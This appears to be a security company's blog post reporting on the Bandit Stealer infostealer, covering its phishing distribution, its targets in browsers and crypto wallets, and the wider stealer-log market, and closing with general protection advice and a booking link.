Blog

Executive Summary. Bandit Stealer is a new information-stealing malware that targets web browsers and cryptocurrency wallets. Developed in Go, it exploits runas.exe on Windows to bypass security measures. It conceals its presence and collects personal data. Criminals distribute this malware via phishing emails. Vigilance and robust security measures are crucial in combating this developing threat.

Watch the BruceCᴀsᴛ™ where we discuss the Bandit info stealer malware

Check out the Triad Network Security video that reviews the Bandit info stealer malware.

Bandit Stealer: A Stealthy Malware Targeting Browsers and Crypto Wallets

Cybersecurity researchers have discovered a new information-stealing malware known as Bandit info stealer. The ability of this malware to attack multiple web browsers and cryptocurrency wallets is why it’s getting noticed.

Where did Bandit come from?

Developed using the Go programming language, Bandit Stealer has the potential for cross-platform compatibility. The malware takes advantage of runas.exe to gain admin access to Windows systems and get past security measures.

Bandit distribution

Bandit Stealer spreads by pretending to be a harmless Microsoft Word file in phishing emails..

In the background, the malware activates while the MS Word attachment distracts the user. Trend Micro also detected a fake installer of Heart Sender, used to deceive users into launching the embedded malware. Another recent discovery involves a Rust-based info stealer targeting Windows systems.

This malware uses a webhook from GitHub Codespaces. It uses that service as an exfiltration channel to get sensitive information. It attacks from web browsers, credit cards, cryptocurrency wallets, and platforms like Steam and Discord. It achieves persistence by modifying the installed Discord client with injected JavaScript code.

With the development of so-called “commodity” stealer malware, such as Luca, StrelaStealer, DarkCloud, WhiteSnake, and Invicta Stealer, criminals have depended on spam emails and fake versions of popular apps for distribution.

Cybercriminals use hacked YouTube channels to promote illegal software to millions of viewers..

What do criminals achieve with Bandit?

The stolen information gathered by malware strains serves various malicious purposes, including:

• Identity theft.
• Financial theft.
• Data breaches.
• Credential stuffing attacks.
• Account takeovers.
• More.

The sale of data to other threat actors can enable follow-on attacks such as targeted campaigns, ransomware, or extortion.

The 30,000-foot view

Stealer malware is evolving due to the availability of tools in the MaaS market.

SecureWorks CTU reports a thriving infostealer market, with a 670% increase in stolen logs on forums like Russian Market. Russian Market offers a substantial number of logs for sale, surpassing its competitors. The underground economy built around info stealers presents lucrative opportunities for low-skilled threat actors.

Law enforcement actions have limited impact on cybercriminals who adapt by moving to platforms like Telegram. People and groups should be careful and use strong security measures. Protect yourself from malware by regularly updating software, using strong passwords, being cautious of suspicious emails and attachments, and using reliable antivirus software.

Go Further with Triad Network Security

The discovery of Bandit Stealer and its targeting of browsers and crypto wallets emphasizes the need for continuous monitoring and proactive defense mechanisms. The cybersecurity landscape continues to develop, and staying informed about the latest threats is vital for effective protection. Follow us on Twitter and LinkedIn for updates and exclusive content.

Book your free Business Strategy Session with Triad Network Security.

Schedule a convenient day and time on our online booking page:

https://triadnetworksecurity.com/book/